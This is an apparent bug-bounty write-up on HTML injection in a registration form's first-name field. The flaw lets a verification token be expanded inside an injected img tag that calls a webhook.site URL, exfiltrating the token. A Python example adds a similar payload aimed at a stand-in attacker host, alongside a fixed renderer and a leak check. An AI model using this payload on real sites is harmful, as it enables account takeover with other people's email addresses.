How I Leveraged HTML Injection to Create an Account Using Someone Else’s Email


Step 1: Understanding the Registration Process

My journey began with an in-depth analysis of the registration process on a web application that required users to provide their email addresses for account creation. Upon registration, the application sent a verification email to the provided address, which included a unique verification link. The email contained a greeting that dynamically incorporated the user’s first name, allowing for potential HTML injection.

Step 2: Discovering the HTML Injection Vulnerability

While exploring the registration form, I noticed that the application did not properly sanitize the input in the “First Name” field. This oversight allowed me to inject HTML code into the field, which would subsequently appear in the verification email. I tested various payloads to see how they would render in the email.

After several attempts, I found that the application treated {token} in my input as a template placeholder: the string was replaced with the real verification token, which let me embed the token inside my injected HTML.

Step 3: Constructing the Payload to Capture the Verification Token

With {token} now reflecting the verification token in the email, I moved on to crafting a payload that would transmit this token to a server I controlled. I used the following injection in the first name field to achieve this:

<img src='https://webhook.site/[ ]?token={token}'>

When the email was rendered, this payload embedded an image tag with a source URL pointing to my server, using {token} as part of the query string. This allowed the verification token to be sent directly to my server as soon as the email was opened.
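To make the failure mode concrete, here is an added Python example (not code from this write-up or from the affected application) that reproduces the two defects described above, an unescaped first name and a second placeholder-expansion pass run over user data, next to a hardened renderer and a check that flags a token leaking to a non-trusted host. The template text, host names and payload are constructed for the example.

```python
import html
import re
from urllib.parse import urlparse

# Constructed template, assumed to resemble the greeting described in the
# write-up: it carries both a first-name placeholder and a {token} placeholder.
TEMPLATE = (
    "<p>Hi {first_name},</p>"
    "<p>Verify: <a href='https://example.test/verify?t={token}'>link</a></p>"
)
TRUSTED_HOST = "example.test"  # the only host that should ever receive the token

# Constructed payload in the same shape as the write-up's (placeholder host).
PAYLOAD = "<img src='https://attacker.invalid/?token={token}'>"


def render_vulnerable(first_name: str, token: str) -> str:
    """Reproduces the bug: the raw name is spliced into the template first,
    then a second pass expands every {token}, including one the user typed."""
    body = TEMPLATE.replace("{first_name}", first_name)  # no HTML escaping
    return body.replace("{token}", token)                # expands attacker's {token} too


def render_safe(first_name: str, token: str) -> str:
    """Hardened: fill placeholders in a single pass from the trusted template
    only, and HTML-escape user data so it cannot introduce tags or attributes."""
    values = {"first_name": html.escape(first_name, quote=True), "token": token}
    # str.format_map parses placeholders in TEMPLATE only; braces inside the
    # inserted value are plain text and are never expanded.
    return TEMPLATE.format_map(values)


def token_leaks(rendered: str, token: str) -> list[str]:
    """Defender check: return every src/href URL in the rendered mail that
    carries the token but does not point at the trusted verification host."""
    urls = re.findall(r"""(?:src|href)=['"]([^'"]+)['"]""", rendered)
    return [u for u in urls if token in u and urlparse(u).hostname != TRUSTED_HOST]


if __name__ == "__main__":
    demo_token = "abc123"  # constructed; a real token would be random
    print("vulnerable leaks:", token_leaks(render_vulnerable(PAYLOAD, demo_token), demo_token))
    print("hardened leaks:  ", token_leaks(render_safe(PAYLOAD, demo_token), demo_token))
```

Running the block prints one leaked URL for the vulnerable renderer and an empty list for the hardened one, while the legitimate verification link still contains the token in both cases.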

Conclusion

This vulnerability demonstrates how a seemingly minor HTML injection issue can have significant security implications. By sanitizing and HTML-encoding user-supplied values before they are inserted into templates, especially in sensitive processes like email verification, organizations can prevent malicious actors from exploiting these weaknesses.
